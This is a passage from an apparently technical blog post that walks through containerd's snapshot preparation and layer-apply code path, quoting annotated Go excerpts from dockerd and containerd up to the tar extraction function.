    <span class="n">topHalf</span> <span class="o">:=</span> <span class="k">func</span><span class="p">(</span><span class="n">i</span> <span class="kt">int</span><span class="p">,</span> <span class="n">desc</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">,</span> <span class="n">span</span> <span class="o">*</span><span class="n">tracing</span><span class="o">.</span><span class="n">Span</span><span class="p">,</span> <span class="n">startAt</span> <span class="n">time</span><span class="o">.</span><span class="n">Time</span><span class="p">)</span> <span class="p">(</span><span class="o">&lt;-</span><span class="k">chan</span> <span class="o">*</span><span class="n">unpackStatus</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="k">var</span> <span class="p">(</span>
            <span class="n">key</span>    <span class="kt">string</span>
            <span class="n">mounts</span> <span class="p">[]</span><span class="n">mount</span><span class="o">.</span><span class="n">Mount</span>
            <span class="n">opts</span>   <span class="o">=</span> <span class="nb">append</span><span class="p">(</span><span class="n">unpack</span><span class="o">.</span><span class="n">SnapshotOpts</span><span class="p">,</span> <span class="n">snapshots</span><span class="o">.</span><span class="n">WithLabels</span><span class="p">(</span><span class="n">snapshotLabels</span><span class="p">))</span>
        <span class="p">)</span>
        <span class="c">// [...]</span>
        <span class="n">key</span> <span class="o">=</span> <span class="n">fmt</span><span class="o">.</span><span class="n">Sprintf</span><span class="p">(</span><span class="n">snapshots</span><span class="o">.</span><span class="n">UnpackKeyFormat</span><span class="p">,</span> <span class="n">uniquePart</span><span class="p">(),</span> <span class="n">chainID</span><span class="p">)</span>
        <span class="n">mounts</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">sn</span><span class="o">.</span><span class="n">Prepare</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">key</span><span class="p">,</span> <span class="n">parent</span><span class="p">,</span> <span class="n">opts</span><span class="o">...</span><span class="p">)</span> <span class="c">// [1]</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Snapshot preparation ends up sending a <code class="language-plaintext highlighter-rouge">PrepareSnapshotRequest</code> [2] request to <code class="language-plaintext highlighter-rouge">containerd</code>.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/core/snapshots/proxy/proxy.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">p</span> <span class="o">*</span><span class="n">proxySnapshotter</span><span class="p">)</span> <span class="n">Prepare</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">key</span><span class="p">,</span> <span class="n">parent</span> <span class="kt">string</span><span class="p">,</span> <span class="n">opts</span> <span class="o">...</span><span class="n">snapshots</span><span class="o">.</span><span class="n">Opt</span><span class="p">)</span> <span class="p">([]</span><span class="n">mount</span><span class="o">.</span><span class="n">Mount</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">resp</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">p</span><span class="o">.</span><span class="n">client</span><span class="o">.</span><span class="n">Prepare</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">snapshotsapi</span><span class="o">.</span><span class="n">PrepareSnapshotRequest</span><span class="p">{</span> <span class="c">// [2]</span>
        <span class="n">Snapshotter</span><span class="o">:</span> <span class="n">p</span><span class="o">.</span><span class="n">snapshotterName</span><span class="p">,</span> <span class="c">// by default "overlayfs"</span>
        <span class="n">Key</span><span class="o">:</span>         <span class="n">key</span><span class="p">,</span>
        <span class="n">Parent</span><span class="o">:</span>      <span class="n">parent</span><span class="p">,</span>
        <span class="n">Labels</span><span class="o">:</span>      <span class="n">local</span><span class="o">.</span><span class="n">Labels</span><span class="p">,</span>
    <span class="p">})</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="n">mount</span><span class="o">.</span><span class="n">FromProto</span><span class="p">(</span><span class="n">resp</span><span class="o">.</span><span class="n">Mounts</span><span class="p">),</span> <span class="no">nil</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">containerd</code>’s handler internally creates snapshot-related files and directories [3], and then calls <code class="language-plaintext highlighter-rouge">o.mounts(s, info)</code> to generate overlayfs mounting options [4].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// plugins/services/snapshots/service.go</span>
<span class="c">// from _Snapshots_Prepare_Handler()</span>
<span class="k">func</span> <span class="p">(</span><span class="n">s</span> <span class="o">*</span><span class="n">service</span><span class="p">)</span> <span class="n">Prepare</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">pr</span> <span class="o">*</span><span class="n">snapshotsapi</span><span class="o">.</span><span class="n">PrepareSnapshotRequest</span><span class="p">)</span> <span class="p">(</span><span class="o">*</span><span class="n">snapshotsapi</span><span class="o">.</span><span class="n">PrepareSnapshotResponse</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">sn</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">s</span><span class="o">.</span><span class="n">getSnapshotter</span><span class="p">(</span><span class="n">pr</span><span class="o">.</span><span class="n">Snapshotter</span><span class="p">)</span> <span class="c">// "overlayfs"</span>
    <span class="c">// [...]</span>
    <span class="n">mounts</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">sn</span><span class="o">.</span><span class="n">Prepare</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">pr</span><span class="o">.</span><span class="n">Key</span><span class="p">,</span> <span class="n">pr</span><span class="o">.</span><span class="n">Parent</span><span class="p">,</span> <span class="n">opts</span><span class="o">...</span><span class="p">)</span> <span class="c">// &lt;--------</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="o">&amp;</span><span class="n">snapshotsapi</span><span class="o">.</span><span class="n">PrepareSnapshotResponse</span><span class="p">{</span>
        <span class="n">Mounts</span><span class="o">:</span> <span class="n">mount</span><span class="o">.</span><span class="n">ToProto</span><span class="p">(</span><span class="n">mounts</span><span class="p">),</span>
    <span class="p">},</span> <span class="no">nil</span>
<span class="p">}</span>

<span class="c">// core/metadata/snapshot.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">s</span> <span class="o">*</span><span class="n">snapshotter</span><span class="p">)</span> <span class="n">Prepare</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">key</span><span class="p">,</span> <span class="n">parent</span> <span class="kt">string</span><span class="p">,</span> <span class="n">opts</span> <span class="o">...</span><span class="n">snapshots</span><span class="o">.</span><span class="n">Opt</span><span class="p">)</span> <span class="p">([]</span><span class="n">mount</span><span class="o">.</span><span class="n">Mount</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">mounts</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">s</span><span class="o">.</span><span class="n">createSnapshot</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">key</span><span class="p">,</span> <span class="n">parent</span><span class="p">,</span> <span class="no">false</span><span class="p">,</span> <span class="n">opts</span><span class="p">)</span> <span class="c">// &lt;--------</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="n">mounts</span><span class="p">,</span> <span class="no">nil</span>
<span class="p">}</span>

<span class="k">func</span> <span class="p">(</span><span class="n">s</span> <span class="o">*</span><span class="n">snapshotter</span><span class="p">)</span> <span class="n">createSnapshot</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">key</span><span class="p">,</span> <span class="n">parent</span> <span class="kt">string</span><span class="p">,</span> <span class="n">readonly</span> <span class="kt">bool</span><span class="p">,</span> <span class="n">opts</span> <span class="p">[]</span><span class="n">snapshots</span><span class="o">.</span><span class="n">Opt</span><span class="p">)</span> <span class="p">([]</span><span class="n">mount</span><span class="o">.</span><span class="n">Mount</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">m</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">s</span><span class="o">.</span><span class="n">Snapshotter</span><span class="o">.</span><span class="n">Prepare</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">bkey</span><span class="p">,</span> <span class="n">bparent</span><span class="p">,</span> <span class="n">bopts</span><span class="o">...</span><span class="p">)</span> <span class="c">// &lt;--------</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="c">// plugins/snapshots/overlay/overlay.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">o</span> <span class="o">*</span><span class="n">snapshotter</span><span class="p">)</span> <span class="n">Prepare</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">key</span><span class="p">,</span> <span class="n">parent</span> <span class="kt">string</span><span class="p">,</span> <span class="n">opts</span> <span class="o">...</span><span class="n">snapshots</span><span class="o">.</span><span class="n">Opt</span><span class="p">)</span> <span class="p">([]</span><span class="n">mount</span><span class="o">.</span><span class="n">Mount</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">return</span> <span class="n">o</span><span class="o">.</span><span class="n">createSnapshot</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">snapshots</span><span class="o">.</span><span class="n">KindActive</span><span class="p">,</span> <span class="n">key</span><span class="p">,</span> <span class="n">parent</span><span class="p">,</span> <span class="n">opts</span><span class="p">)</span> <span class="c">// &lt;--------</span>
<span class="p">}</span>

<span class="c">// plugins/snapshots/overlay/overlay.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">o</span> <span class="o">*</span><span class="n">snapshotter</span><span class="p">)</span> <span class="n">createSnapshot</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">kind</span> <span class="n">snapshots</span><span class="o">.</span><span class="n">Kind</span><span class="p">,</span> <span class="n">key</span><span class="p">,</span> <span class="n">parent</span> <span class="kt">string</span><span class="p">,</span> <span class="n">opts</span> <span class="p">[]</span><span class="n">snapshots</span><span class="o">.</span><span class="n">Opt</span><span class="p">)</span> <span class="p">(</span><span class="n">_</span> <span class="p">[]</span><span class="n">mount</span><span class="o">.</span><span class="n">Mount</span><span class="p">,</span> <span class="n">err</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">_</span><span class="p">,</span> <span class="n">info</span><span class="p">,</span> <span class="n">_</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">storage</span><span class="o">.</span><span class="n">GetInfo</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">key</span><span class="p">)</span>
    <span class="c">// [...]</span>
    <span class="n">snapshotDir</span> <span class="o">:=</span> <span class="n">filepath</span><span class="o">.</span><span class="n">Join</span><span class="p">(</span><span class="n">o</span><span class="o">.</span><span class="n">root</span><span class="p">,</span> <span class="s">"snapshots"</span><span class="p">)</span>
    <span class="n">td</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">o</span><span class="o">.</span><span class="n">prepareDirectory</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">snapshotDir</span><span class="p">,</span> <span class="n">kind</span><span class="p">)</span>
    <span class="c">// [...]</span>
    <span class="n">path</span> <span class="o">=</span> <span class="n">filepath</span><span class="o">.</span><span class="n">Join</span><span class="p">(</span><span class="n">snapshotDir</span><span class="p">,</span> <span class="n">s</span><span class="o">.</span><span class="n">ID</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">Rename</span><span class="p">(</span><span class="n">td</span><span class="p">,</span> <span class="n">path</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [3]</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="n">o</span><span class="o">.</span><span class="n">mounts</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="n">info</span><span class="p">),</span> <span class="no">nil</span>
<span class="p">}</span>

<span class="k">func</span> <span class="p">(</span><span class="n">o</span> <span class="o">*</span><span class="n">snapshotter</span><span class="p">)</span> <span class="n">mounts</span><span class="p">(</span><span class="n">s</span> <span class="n">storage</span><span class="o">.</span><span class="n">Snapshot</span><span class="p">,</span> <span class="n">info</span> <span class="n">snapshots</span><span class="o">.</span><span class="n">Info</span><span class="p">)</span> <span class="p">[]</span><span class="n">mount</span><span class="o">.</span><span class="n">Mount</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="p">[]</span><span class="n">mount</span><span class="o">.</span><span class="n">Mount</span><span class="p">{</span> <span class="c">// [4]</span>
        <span class="p">{</span>
            <span class="n">Type</span><span class="o">:</span>    <span class="s">"overlay"</span><span class="p">,</span> <span class="c">// or "bind" ...</span>
            <span class="n">Source</span><span class="o">:</span>  <span class="s">"overlay"</span><span class="p">,</span>
            <span class="n">Options</span><span class="o">:</span> <span class="n">options</span><span class="p">,</span>
        <span class="p">},</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>So, before unpacking the layer, <code class="language-plaintext highlighter-rouge">sn.Prepare()</code> creates the snapshot directories that will hold the extracted layers.</p>

<h3 id="23-containerd-apply-handling">2.3. containerd Apply Handling</h3>

<p>The apply request is sent from <code class="language-plaintext highlighter-rouge">dockerd</code> to <code class="language-plaintext highlighter-rouge">containerd</code>.</p>

<p>On the <code class="language-plaintext highlighter-rouge">containerd</code> side, <code class="language-plaintext highlighter-rouge">Apply()</code> is called to handle the request, and it internally iterates through registered processors [1] and wraps them to a chained processor. Later, <code class="language-plaintext highlighter-rouge">apply()</code> is called with the wrapped IO stream [2], which triggers the processor callback in the end.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// plugins/services/diff/local.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">l</span> <span class="o">*</span><span class="n">local</span><span class="p">)</span> <span class="n">Apply</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">er</span> <span class="o">*</span><span class="n">diffapi</span><span class="o">.</span><span class="n">ApplyRequest</span><span class="p">,</span> <span class="n">_</span> <span class="o">...</span><span class="n">grpc</span><span class="o">.</span><span class="n">CallOption</span><span class="p">)</span> <span class="p">(</span><span class="o">*</span><span class="n">diffapi</span><span class="o">.</span><span class="n">ApplyResponse</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">for</span> <span class="n">_</span><span class="p">,</span> <span class="n">differ</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">l</span><span class="o">.</span><span class="n">differs</span> <span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="n">ocidesc</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">differ</span><span class="o">.</span><span class="n">Apply</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">desc</span><span class="p">,</span> <span class="n">mounts</span><span class="p">,</span> <span class="n">opts</span><span class="o">...</span><span class="p">)</span> <span class="c">// &lt;--------</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c">// core/diff/apply/apply.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">s</span> <span class="o">*</span><span class="n">fsApplier</span><span class="p">)</span> <span class="n">Apply</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">desc</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">,</span> <span class="n">mounts</span> <span class="p">[]</span><span class="n">mount</span><span class="o">.</span><span class="n">Mount</span><span class="p">,</span> <span class="n">opts</span> <span class="o">...</span><span class="n">diff</span><span class="o">.</span><span class="n">ApplyOpt</span><span class="p">)</span> <span class="p">(</span><span class="n">d</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">,</span> <span class="n">err</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">var</span> <span class="n">processors</span> <span class="p">[]</span><span class="n">diff</span><span class="o">.</span><span class="n">StreamProcessor</span>
    <span class="k">for</span> <span class="p">{</span>
        <span class="k">if</span> <span class="n">processor</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">diff</span><span class="o">.</span><span class="n">GetProcessor</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">processor</span><span class="p">,</span> <span class="n">config</span><span class="o">.</span><span class="n">ProcessorPayloads</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [1]</span>
            <span class="c">// [...]</span>
        <span class="p">}</span>
        <span class="n">processors</span> <span class="o">=</span> <span class="nb">append</span><span class="p">(</span><span class="n">processors</span><span class="p">,</span> <span class="n">processor</span><span class="p">)</span>
        <span class="k">if</span> <span class="n">processor</span><span class="o">.</span><span class="n">MediaType</span><span class="p">()</span> <span class="o">==</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">MediaTypeImageLayer</span> <span class="p">{</span>
            <span class="k">break</span>
        <span class="p">}</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
    <span class="n">rc</span> <span class="o">:=</span> <span class="o">&amp;</span><span class="n">readCounter</span><span class="p">{</span>
        <span class="n">r</span><span class="o">:</span> <span class="n">io</span><span class="o">.</span><span class="n">TeeReader</span><span class="p">(</span><span class="n">processor</span><span class="p">,</span> <span class="n">digester</span><span class="o">.</span><span class="n">Hash</span><span class="p">()),</span>
    <span class="p">}</span>

    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">apply</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">mounts</span><span class="p">,</span> <span class="n">rc</span><span class="p">,</span> <span class="n">config</span><span class="o">.</span><span class="n">SyncFs</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [2]</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>How does <code class="language-plaintext highlighter-rouge">GetProcessor()</code> decide which decoder to use? It calls all registered handlers until one returns success [3]. By default, there is at least one processor: <code class="language-plaintext highlighter-rouge">compressedHandler</code> [4].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// core/diff/stream.go</span>
<span class="k">func</span> <span class="n">GetProcessor</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">stream</span> <span class="n">StreamProcessor</span><span class="p">,</span> <span class="n">payloads</span> <span class="k">map</span><span class="p">[</span><span class="kt">string</span><span class="p">]</span><span class="n">typeurl</span><span class="o">.</span><span class="n">Any</span><span class="p">)</span> <span class="p">(</span><span class="n">StreamProcessor</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">for</span> <span class="n">i</span> <span class="o">:=</span> <span class="nb">len</span><span class="p">(</span><span class="n">handlers</span><span class="p">)</span> <span class="o">-</span> <span class="m">1</span><span class="p">;</span> <span class="n">i</span> <span class="o">&gt;=</span> <span class="m">0</span><span class="p">;</span> <span class="n">i</span><span class="o">--</span> <span class="p">{</span>
        <span class="n">processor</span><span class="p">,</span> <span class="n">ok</span> <span class="o">:=</span> <span class="n">handlers</span><span class="p">[</span><span class="n">i</span><span class="p">](</span><span class="n">ctx</span><span class="p">,</span> <span class="n">stream</span><span class="o">.</span><span class="n">MediaType</span><span class="p">())</span> <span class="c">// [3]</span>
        <span class="k">if</span> <span class="n">ok</span> <span class="p">{</span>
            <span class="k">return</span> <span class="n">processor</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">stream</span><span class="p">,</span> <span class="n">payloads</span><span class="p">)</span>
        <span class="p">}</span>
    <span class="p">}</span>
    <span class="k">return</span> <span class="no">nil</span><span class="p">,</span> <span class="n">ErrNoProcessor</span>
<span class="p">}</span>

<span class="k">func</span> <span class="n">init</span><span class="p">()</span> <span class="p">{</span>
    <span class="n">RegisterProcessor</span><span class="p">(</span><span class="n">compressedHandler</span><span class="p">)</span> <span class="c">// [4]</span>
<span class="p">}</span>

<span class="k">func</span> <span class="n">RegisterProcessor</span><span class="p">(</span><span class="n">handler</span> <span class="n">Handler</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">handlers</span> <span class="o">=</span> <span class="nb">append</span><span class="p">(</span><span class="n">handlers</span><span class="p">,</span> <span class="n">handler</span><span class="p">)</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">compressedHandler()</code> calls <code class="language-plaintext highlighter-rouge">DiffCompression()</code> to verify the <strong>compression type</strong> [5] and returns a nested function, which finds the <strong>matching streaming decoder</strong> [6] and returns it.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// core/diff/stream.go</span>
<span class="k">func</span> <span class="n">compressedHandler</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">mediaType</span> <span class="kt">string</span><span class="p">)</span> <span class="p">(</span><span class="n">StreamProcessorInit</span><span class="p">,</span> <span class="kt">bool</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">compressed</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">images</span><span class="o">.</span><span class="n">DiffCompression</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">mediaType</span><span class="p">)</span> <span class="c">// [5]</span>
    <span class="c">// [...]</span>
    <span class="k">if</span> <span class="n">compressed</span> <span class="o">!=</span> <span class="s">""</span> <span class="p">{</span>
        <span class="k">return</span> <span class="k">func</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">stream</span> <span class="n">StreamProcessor</span><span class="p">,</span> <span class="n">payloads</span> <span class="k">map</span><span class="p">[</span><span class="kt">string</span><span class="p">]</span><span class="n">typeurl</span><span class="o">.</span><span class="n">Any</span><span class="p">)</span> <span class="p">(</span><span class="n">StreamProcessor</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">ds</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">compression</span><span class="o">.</span><span class="n">DecompressStream</span><span class="p">(</span><span class="n">stream</span><span class="p">)</span> <span class="c">// [6]</span>
            <span class="c">// [...]</span>
            <span class="k">return</span> <span class="o">&amp;</span><span class="n">compressedProcessor</span><span class="p">{</span>
                <span class="n">rc</span><span class="o">:</span> <span class="n">ds</span><span class="p">,</span>
            <span class="p">},</span> <span class="no">nil</span>
        <span class="p">},</span> <span class="no">true</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Going back to <code class="language-plaintext highlighter-rouge">Apply()</code>, the processor is wrapped as an IO stream and then passed to platform-specified <code class="language-plaintext highlighter-rouge">apply()</code>.</p>

<p>In Linux implementation, <code class="language-plaintext highlighter-rouge">apply()</code> in <code class="language-plaintext highlighter-rouge">apply_linux.go</code> decides which directory is used to save the extracted files. For overlayfs, the upper directory is used [7, 8], which is the actual path <code class="language-plaintext highlighter-rouge">"snapshots/&lt;id&gt;/fs"</code> [9].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// core/diff/apply/apply_linux.go</span>
<span class="k">func</span> <span class="n">apply</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">mounts</span> <span class="p">[]</span><span class="n">mount</span><span class="o">.</span><span class="n">Mount</span><span class="p">,</span> <span class="n">r</span> <span class="n">io</span><span class="o">.</span><span class="n">Reader</span><span class="p">,</span> <span class="n">sync</span> <span class="kt">bool</span><span class="p">)</span> <span class="p">(</span><span class="n">retErr</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">switch</span> <span class="p">{</span>
    <span class="k">case</span> <span class="nb">len</span><span class="p">(</span><span class="n">mounts</span><span class="p">)</span> <span class="o">==</span> <span class="m">1</span> <span class="o">&amp;&amp;</span> <span class="n">mounts</span><span class="p">[</span><span class="m">0</span><span class="p">]</span><span class="o">.</span><span class="n">Type</span> <span class="o">==</span> <span class="s">"overlay"</span><span class="o">:</span>
        <span class="c">// [...]</span>
        <span class="n">path</span><span class="p">,</span> <span class="n">parents</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">getOverlayPath</span><span class="p">(</span><span class="n">mounts</span><span class="p">[</span><span class="m">0</span><span class="p">]</span><span class="o">.</span><span class="n">Options</span><span class="p">)</span> <span class="c">// [7]</span>
        <span class="c">// [...]</span>
        <span class="n">_</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">archive</span><span class="o">.</span><span class="n">Apply</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">path</span><span class="p">,</span> <span class="n">r</span><span class="p">,</span> <span class="n">opts</span><span class="o">...</span><span class="p">)</span> <span class="c">// &lt;--------</span>
        <span class="c">// [...]</span>
        <span class="k">return</span> <span class="n">err</span>
    <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="k">func</span> <span class="n">getOverlayPath</span><span class="p">(</span><span class="n">options</span> <span class="p">[]</span><span class="kt">string</span><span class="p">)</span> <span class="p">(</span><span class="n">upper</span> <span class="kt">string</span> <span class="c">/* [8] */</span><span class="p">,</span> <span class="n">lower</span> <span class="p">[]</span><span class="kt">string</span><span class="p">,</span> <span class="n">err</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="c">// plugins/snapshots/overlay/overlay.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">o</span> <span class="o">*</span><span class="n">snapshotter</span><span class="p">)</span> <span class="n">upperPath</span><span class="p">(</span><span class="n">id</span> <span class="kt">string</span><span class="p">)</span> <span class="kt">string</span> <span class="p">{</span>
    <span class="k">return</span> <span class="n">filepath</span><span class="o">.</span><span class="n">Join</span><span class="p">(</span><span class="n">o</span><span class="o">.</span><span class="n">root</span><span class="p">,</span> <span class="s">"snapshots"</span><span class="p">,</span> <span class="n">id</span><span class="p">,</span> <span class="s">"fs"</span><span class="p">)</span> <span class="c">// [9]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Eventually, <code class="language-plaintext highlighter-rouge">applyNaive()</code> [9] is called to untar a diff.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// pkg/archive/tar.go</span>
<span class="k">func</span> <span class="n">Apply</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">root</span> <span class="kt">string</span><span class="p">,</span> <span class="n">r</span> <span class="n">io</span><span class="o">.</span><span class="n">Reader</span><span class="p">,</span> <span class="n">opts</span> <span class="o">...</span><span class="n">ApplyOpt</span><span class="p">)</span> <span class="p">(</span><span class="kt">int64</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">root</span> <span class="o">=</span> <span class="n">filepath</span><span class="o">.</span><span class="n">Clean</span><span class="p">(</span><span class="n">root</span><span class="p">)</span>
    <span class="c">// [...]</span>
    <span class="n">options</span><span class="o">.</span><span class="n">applyFunc</span> <span class="o">=</span> <span class="n">applyNaive</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="n">options</span><span class="o">.</span><span class="n">applyFunc</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">root</span><span class="p">,</span> <span class="n">r</span><span class="p">,</span> <span class="n">options</span><span class="p">)</span> <span class="c">// [9]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Here, I want to explain more about two terms: <strong>“diff”</strong> and <strong>“layer”</strong>, since they are basically the same thing but in different states.</p>

<p>The raw tar data we download from the remote registry is the <strong>layer</strong>, kept in the content store. To unpack it, the layer (a compressed tar+gzip file) is decompressed into a <strong>diff</strong> — a <strong>stream of the uncompressed tar</strong>. That diff stream is then read and untarred, and the extracted files are saved into an isolated directory (named by snapshot ID) kept in the snapshot plugin.</p>

<h3 id="24-untar">2.4. untar</h3>

<p><code class="language-plaintext highlighter-rouge">applyNaive()</code> is the key function because it covers almost all of the tar extraction logic. It reads an entry from the tar file [1] and gets the file path [2]. It then calls <code class="language-plaintext highlighter-rouge">createTarFile()</code> to parse the entry [3].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// pkg/archive/tar.go</span>
